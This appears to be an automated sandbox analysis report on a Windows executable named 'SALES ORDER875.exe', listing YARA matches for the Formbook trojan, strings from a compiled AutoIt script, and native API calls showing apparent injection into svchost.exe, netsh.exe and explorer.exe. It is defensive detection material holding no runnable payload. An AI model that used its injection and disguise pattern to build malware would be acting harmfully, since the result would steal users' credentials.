Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.4140986795.000000000E678000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: Process Memory Space: SALES ORDER875.exe PID: 6380, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 5228, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: netsh.exe PID: 7032, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: SALES ORDER875.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: SALES ORDER875.exe, 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6a5829fb-b
Source: SALES ORDER875.exe, 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_707b4d2b-4
Source: SALES ORDER875.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_0bccb60c-9
Source: SALES ORDER875.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_30d91295-4

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: SALES ORDER875.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272B60 NtClose,LdrInitializeThunk,	1_2_03272B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_03272BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272AD0 NtReadFile,LdrInitializeThunk,	1_2_03272AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272F30 NtCreateSection,LdrInitializeThunk,	1_2_03272F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272FB0 NtResumeThread,LdrInitializeThunk,	1_2_03272FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272F90 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_03272F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272FE0 NtCreateFile,LdrInitializeThunk,	1_2_03272FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_03272EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272E80 NtReadVirtualMemory,LdrInitializeThunk,	1_2_03272E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272D30 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_03272D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272D10 NtMapViewOfSection,LdrInitializeThunk,	1_2_03272D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03272DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272DD0 NtDelayExecution,LdrInitializeThunk,	1_2_03272DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272CA0 NtQueryInformationToken,LdrInitializeThunk,	1_2_03272CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03274340 NtSetContextThread,	1_2_03274340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03274650 NtSuspendThread,	1_2_03274650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272BA0 NtEnumerateValueKey,	1_2_03272BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272B80 NtQueryInformationFile,	1_2_03272B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272BE0 NtQueryValueKey,	1_2_03272BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272AB0 NtWaitForSingleObject,	1_2_03272AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272AF0 NtWriteFile,	1_2_03272AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272F60 NtCreateProcessEx,	1_2_03272F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272FA0 NtQuerySection,	1_2_03272FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272E30 NtWriteVirtualMemory,	1_2_03272E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272EE0 NtQueueApcThread,	1_2_03272EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272D00 NtSetInformationFile,	1_2_03272D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272DB0 NtEnumerateKey,	1_2_03272DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272C00 NtQueryInformationProcess,	1_2_03272C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272C60 NtCreateKey,	1_2_03272C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272C70 NtFreeVirtualMemory,	1_2_03272C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272CF0 NtOpenProcess,	1_2_03272CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272CC0 NtQueryVirtualMemory,	1_2_03272CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03273010 NtOpenDirectoryObject,	1_2_03273010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03273090 NtSetValueKey,	1_2_03273090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032735C0 NtCreateMutant,	1_2_032735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032739B0 NtGetContextThread,	1_2_032739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03273D10 NtOpenProcessToken,	1_2_03273D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03273D70 NtOpenThread,	1_2_03273D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006CA320 NtCreateFile,	1_2_006CA320
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006CA3D0 NtReadFile,	1_2_006CA3D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006CA450 NtClose,	1_2_006CA450
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006CA500 NtAllocateVirtualMemory,	1_2_006CA500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006CA31D NtCreateFile,	1_2_006CA31D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006CA44A NtClose,	1_2_006CA44A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,	1_2_0316A036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A042 NtQueryInformationProcess,	1_2_0316A042
Source: C:\Windows\explorer.exe	Code function: 3_2_0E660232 NtCreateFile,	3_2_0E660232
Source: C:\Windows\explorer.exe	Code function: 3_2_0E661E12 NtProtectVirtualMemory,	3_2_0E661E12
Source: C:\Windows\explorer.exe	Code function: 3_2_0E661E0A NtProtectVirtualMemory,	3_2_0E661E0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42AD0 NtReadFile,LdrInitializeThunk,	4_2_00E42AD0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42B60 NtClose,LdrInitializeThunk,	4_2_00E42B60
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_00E42CA0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42C60 NtCreateKey,LdrInitializeThunk,	4_2_00E42C60
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_00E42C70
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_00E42DF0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42DD0 NtDelayExecution,LdrInitializeThunk,	4_2_00E42DD0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_00E42D10
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	4_2_00E42EA0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42FE0 NtCreateFile,LdrInitializeThunk,	4_2_00E42FE0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42F30 NtCreateSection,LdrInitializeThunk,	4_2_00E42F30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E435C0 NtCreateMutant,LdrInitializeThunk,	4_2_00E435C0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E44340 NtSetContextThread,	4_2_00E44340
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E44650 NtSuspendThread,	4_2_00E44650
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42AF0 NtWriteFile,	4_2_00E42AF0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42AB0 NtWaitForSingleObject,	4_2_00E42AB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42BE0 NtQueryValueKey,	4_2_00E42BE0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42BF0 NtAllocateVirtualMemory,	4_2_00E42BF0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42BA0 NtEnumerateValueKey,	4_2_00E42BA0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42B80 NtQueryInformationFile,	4_2_00E42B80
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42CF0 NtOpenProcess,	4_2_00E42CF0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42CC0 NtQueryVirtualMemory,	4_2_00E42CC0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42C00 NtQueryInformationProcess,	4_2_00E42C00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42DB0 NtEnumerateKey,	4_2_00E42DB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42D30 NtUnmapViewOfSection,	4_2_00E42D30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42D00 NtSetInformationFile,	4_2_00E42D00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42EE0 NtQueueApcThread,	4_2_00E42EE0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42E80 NtReadVirtualMemory,	4_2_00E42E80
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42E30 NtWriteVirtualMemory,	4_2_00E42E30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42FA0 NtQuerySection,	4_2_00E42FA0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42FB0 NtResumeThread,	4_2_00E42FB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42F90 NtProtectVirtualMemory,	4_2_00E42F90
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E42F60 NtCreateProcessEx,	4_2_00E42F60
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E43090 NtSetValueKey,	4_2_00E43090
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E43010 NtOpenDirectoryObject,	4_2_00E43010
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E439B0 NtGetContextThread,	4_2_00E439B0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E43D70 NtOpenThread,	4_2_00E43D70
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E43D10 NtOpenProcessToken,	4_2_00E43D10
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_001EA320 NtCreateFile,	4_2_001EA320
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_001EA3D0 NtReadFile,	4_2_001EA3D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_001EA450 NtClose,	4_2_001EA450
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_001EA31D NtCreateFile,	4_2_001EA31D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_001EA44A NtClose,	4_2_001EA44A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00C2A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,	4_2_00C2A036
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00C29BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	4_2_00C29BAF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00C2A042 NtQueryInformationProcess,	4_2_00C2A042
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00C29BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00C29BB2

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003ED5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_003ED5EB

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_003E1201

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003EE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_003EE8F6

Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_0038BF40	0_2_0038BF40
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_00388060	0_2_00388060
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003F2046	0_2_003F2046
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003E8298	0_2_003E8298
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003BE4FF	0_2_003BE4FF
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003B676B	0_2_003B676B
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_00414873	0_2_00414873
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003ACAA0	0_2_003ACAA0
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_0038CAF0	0_2_0038CAF0
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_0039CC39	0_2_0039CC39
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003B6DD9	0_2_003B6DD9
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_0039B119	0_2_0039B119
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003891C0	0_2_003891C0
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003A1394	0_2_003A1394
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003A1706	0_2_003A1706
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003A781B	0_2_003A781B
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_00387920	0_2_00387920
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_0039997D	0_2_0039997D
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003A19B0	0_2_003A19B0
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003A7A4A	0_2_003A7A4A
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003A1C77	0_2_003A1C77
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003A7CA7	0_2_003A7CA7
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_0040BE44	0_2_0040BE44
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003B9EEE	0_2_003B9EEE
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003A1F32	0_2_003A1F32
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_01A91320	0_2_01A91320
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_01A91532	0_2_01A91532
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FA352	1_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324E3F0	1_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033003E6	1_2_033003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C02C0	1_2_032C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03230100	1_2_03230100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DA118	1_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C8158	1_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F41A2	1_2_032F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033001AA	1_2_033001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F81CC	1_2_032F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D2000	1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03264750	1_2_03264750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323C7C0	1_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325C6E0	1_2_0325C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240535	1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03300591	1_2_03300591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E4420	1_2_032E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F2446	1_2_032F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EE4F6	1_2_032EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FAB40	1_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F6BD7	1_2_032F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03256962	1_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0330A9A6	1_2_0330A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324A840	1_2_0324A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03242840	1_2_03242840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032268B8	1_2_032268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E8F0	1_2_0326E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03282F28	1_2_03282F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03260F30	1_2_03260F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E2F30	1_2_032E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B4F40	1_2_032B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BEFA0	1_2_032BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03232FC8	1_2_03232FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FEE26	1_2_032FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240E59	1_2_03240E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03252E90	1_2_03252E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FCE93	1_2_032FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FEEDB	1_2_032FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324AD00	1_2_0324AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DCD1F	1_2_032DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03258DBF	1_2_03258DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323ADE0	1_2_0323ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240C00	1_2_03240C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0CB5	1_2_032E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03230CF2	1_2_03230CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F132D	1_2_032F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322D34C	1_2_0322D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0328739A	1_2_0328739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032452A0	1_2_032452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E12ED	1_2_032E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325D2F0	1_2_0325D2F0
